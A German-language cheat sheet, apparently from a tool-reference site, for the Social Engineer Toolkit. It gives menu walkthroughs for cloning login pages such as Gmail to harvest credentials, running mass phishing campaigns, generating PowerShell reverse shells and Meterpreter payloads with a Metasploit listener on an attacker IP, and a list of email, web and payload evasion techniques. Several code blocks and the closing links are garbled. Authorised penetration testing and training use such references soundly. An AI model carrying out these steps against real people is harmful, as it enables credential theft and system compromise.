Social Engineer Toolkit (SET)
Das Social Engineer Toolkit (SET) ist ein offener Penetrationstest für Social Engineering-Angriffe. Entwickelt von David Kennedy (ReL1K) und dem TrustedSec Team automatisiert SET eine Reihe von Social Engineering-Angriffen und bietet eine umfassende Plattform für die Prüfung menschlicher Schwachstellen in Sicherheitsbewertungen.
Installation und Inbetriebnahme
Installation auf Kali Linux
```bash
SET comes pre-installed on Kali Linux
setoolkit
Update SET
cd /opt/set git pull ```_
Manuelle Installation
```bash
Clone repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/ cd set/
Install dependencies
pip3 install -r requirements.txt
Run setup
python setup.py install
Launch SET
python setoolkit ```_
Konfiguration
```bash
Edit configuration file
nano /etc/setoolkit/set.config
Key configuration options:
WEBATTACK_EMAIL=ON
APACHE_SERVER=ON
METASPLOIT_PATH=/usr/share/metasploit-framework
SENDMAIL=ON
EMAIL_PROVIDER=GMAIL
```_
Hauptmenü Optionen
1) Social-Engineering Angriffe
```bash
Launch SET
setoolkit
Select option 1 from main menu
Social-Engineering Attacks submenu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
```_
Spear-Phishing Angriffsvektoren
```bash
Option 1 from Social-Engineering Attacks
Spear-Phishing submenu:
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
Mass Email Attack
- Configure SMTP settings
- Import email list
- Create or select email template
- Attach malicious payload
FileFormat Payload
- Select file format (PDF, DOC, XLS, etc.)
- Choose exploit
- Generate malicious file
Email Templates
- Pre-built templates for common scenarios
- Custom template creation
- HTML email support
```_
Website Angriff Vektoren
```bash
Option 2 from Social-Engineering Attacks
Website Attack submenu:
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
Credential Harvester
- Clone legitimate websites
- Capture credentials
- Redirect after capture
- Email harvested credentials
Java Applet Attack
- Self-signed Java applet
- Social engineering prompt
- Payload execution after acceptance
Browser Exploit Method
- Metasploit browser exploits
- Automatic exploitation
- Multiple exploit attempts
```_
Angriffszenarien
Credential Harvesting
```bash
Start SET
setoolkit
Select: 1) Social-Engineering Attacks
Select: 2) Website Attack Vectors
Select: 3) Credential Harvester Attack Method
Harvester options:
1) Web Templates
2) Site Cloner
3) Custom Import
Site Cloner example:
Enter URL to clone: https://gmail.com
SET will clone the site and host locally
Captured credentials saved to /root/.set/reports/
```_
Phishing Email Kampagne
```bash
Start SET
setoolkit
Select: 1) Social-Engineering Attacks
Select: 1) Spear-Phishing Attack Vectors
Select: 1) Perform a Mass Email Attack
Configuration steps:
1) Select attack vector (fileformat, etc.)
2) Configure payload
3) Setup email template
4) Configure SMTP settings
5) Import target email list
6) Send campaign
Email list format (emails.txt):
user1@company.com
user2@company.com
user3@company.com
```_
Infektiöser Mediengenerator
```bash
Start SET
setoolkit
Select: 1) Social-Engineering Attacks
Select: 3) Infectious Media Generator
Media options:
1) File-Format Exploits
2) Standard Metasploit Executable
File-Format Exploits:
- PDF exploits
- Microsoft Office exploits
- Browser-based exploits
Standard Executable:
- Windows executable
- Linux executable
- Mac OSX executable
```_
PowerShell Angriffsvektoren
```bash
Start SET
setoolkit
Select: 1) Social-Engineering Attacks
Select: 9) Powershell Attack Vectors
PowerShell options:
1) PowerShell Alphanumeric Shellcode Injector
2) PowerShell Reverse Shell
3) PowerShell Bind Shell
4) PowerShell Dump SAM Database
Reverse Shell example:
Enter IP address for reverse connection
Enter port for reverse connection
Generate PowerShell command
Execute on target system
```_
Erweiterte Techniken
Individuelle Payloads
```bash
Create custom payload
setoolkit
Select: 1) Social-Engineering Attacks
Select: 4) Create a Payload and Listener
Payload options:
1) Windows Shell Reverse_TCP
2) Windows Meterpreter Reverse_TCP
3) Windows Meterpreter Reverse_HTTP
4) Windows Meterpreter Reverse_HTTPS
5) Linux Shell Reverse_TCP
Configuration:
Set LHOST (attacker IP)
Set LPORT (listening port)
Generate payload
Setup listener
```_
Multi-Attack-Webmethode
```bash
Start SET
setoolkit
Select: 1) Social-Engineering Attacks
Select: 2) Website Attack Vectors
Select: 6) Multi-Attack Web Method
Combines multiple attack vectors:
- Java Applet Attack
- Metasploit Browser Exploit
- Credential Harvester
- Tabnabbing
- Web Jacking
Increases success probability
Automatic fallback methods
Comprehensive attack coverage
```_
Arduino-basierte Angriffe
```bash
Start SET
setoolkit
Select: 1) Social-Engineering Attacks
Select: 6) Arduino-Based Attack Vector
Arduino attack types:
1) Powershell HTTP GET MSF Payload
2) WSCRIPT HTTP GET MSF Payload
3) Powershell HTTP POST MSF Payload
4) WSCRIPT HTTP POST MSF Payload
5) Download-Execute Powershell Attack
6) Download-Execute WSCRIPT Attack
Generates Arduino sketch
Physical access required
Automated payload execution
Bypasses software restrictions
```_
Integration mit Metasploit
Aufbau von Metasploit Integration
```bash
Configure Metasploit path in SET
nano /etc/setoolkit/set.config
Set Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework
Start Metasploit listener
msfconsole msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST attacker_ip msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > exploit -j ```_
Automatisiertes Listener Setup
```bash
SET can automatically setup Metasploit listeners
When creating payloads, select:
"Do you want to start the listener now? [y/n]:"
Select 'y' for automatic listener setup
SET will:
1) Generate appropriate payload
2) Start msfconsole
3) Configure handler
4) Start listener
```_
Reporting und Logging
Erstellungsberichte
```bash
Harvested credentials location
/root/.set/reports/
View captured credentials
cat /root/.set/reports/2024-01-01\ 12:00:00.txt
Email reports (if configured)
Automatic email notifications
Real-time credential capture alerts
```_
Angriffsprotokolle
```bash
SET log files
/root/.set/logs/
View attack logs
tail -f /root/.set/logs/set_logfile.log
Apache access logs (for web attacks)
tail -f /var/log/apache2/access.log
Email logs
tail -f /var/log/mail.log ```_
Berichterstattung
```bash
Generate custom reports
Parse log files for specific information
grep "credential" /root/.set/logs/set_logfile.log
Extract IP addresses
grep -oE "\b([0-9]\\{1,3\\}.)\\{3\\}[0-9]\\{1,3\\}\b" /root/.set/logs/set_logfile.log
Count successful attacks
grep -c "successful" /root/.set/logs/set_logfile.log ```_
Evasion Techniken
E-Mail senden
```bash
Domain reputation management
Use legitimate email providers
Gradual sending patterns
Personalized content
Email headers manipulation
SPF/DKIM configuration
Reply-to address spoofing
Message threading
Content evasion
Image-based content
URL shorteners
Legitimate file hosting
```_
Web Angriff Evasion
```bash
Domain fronting
CDN utilization
SSL/TLS encryption
Legitimate hosting providers
User-Agent rotation
IP address rotation
Traffic timing variation
Legitimate referrer headers
Content delivery
Staged payloads
Encrypted communications
Legitimate file formats
```_
Belastbarkeit Evasion
```bash
Encoding techniques
Encryption methods
Packing/compression
Code obfuscation
Delivery methods
Legitimate file formats
Trusted applications
Signed executables
Execution techniques
Living off the land
PowerShell alternatives
Memory-only execution
```_
Best Practices
Rechtliche und ethische Überlegungen
```bash
Always obtain proper authorization
Document scope and limitations
Follow responsible disclosure
Maintain confidentiality
Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt echo "Client: Company Name" >> authorization.txt echo "Scope: Email addresses, domains" >> authorization.txt echo "Date: $(date)" >> authorization.txt echo "Tester: Your Name" >> authorization.txt ```_
Operationelle Sicherheit
```bash
Use dedicated infrastructure
Implement proper logging
Secure communication channels
Regular backup procedures
Infrastructure isolation
Separate testing networks
Dedicated email accounts
Isolated web servers
Data protection
Encrypted storage
Secure transmission
Proper disposal
```_
Prüfverfahren
```bash
Reconnaissance phase
Target identification
Information gathering
Attack vector selection
Execution phase
Payload delivery
Credential harvesting
System compromise
Post-exploitation
Persistence establishment
Data collection
Evidence gathering
Reporting phase
Impact assessment
Remediation recommendations
Executive summary
```_
Fehlerbehebung
Gemeinsame Themen
```bash
Email delivery problems
Check SMTP configuration
Verify DNS settings
Test email connectivity
Web server issues
Check Apache configuration
Verify port availability
Test web connectivity
Payload generation errors
Verify Metasploit integration
Check dependencies
Update SET framework
Permission issues
Run as root user
Check file permissions
Verify directory access
```_
Konfigurationskorrekturen
```bash
Reset SET configuration
rm /etc/setoolkit/set.config setoolkit # Will recreate config
Update SET framework
cd /opt/set git pull python setup.py install
Fix Apache issues
sudo systemctl restart apache2 sudo systemctl enable apache2
Fix email issues
sudo systemctl restart postfix sudo systemctl enable postfix ```_
Ressourcen
- SET Offizielle Dokumentation
- [TrustedSec Blog](LINK_5 -%20[Social%20Engineering%20Framework](LINK_5___ -%20[NIST%20Cybersecurity%20Framework](__LINK_5___ -%20(SANS%20Social%20Engineering)(__LINK_5)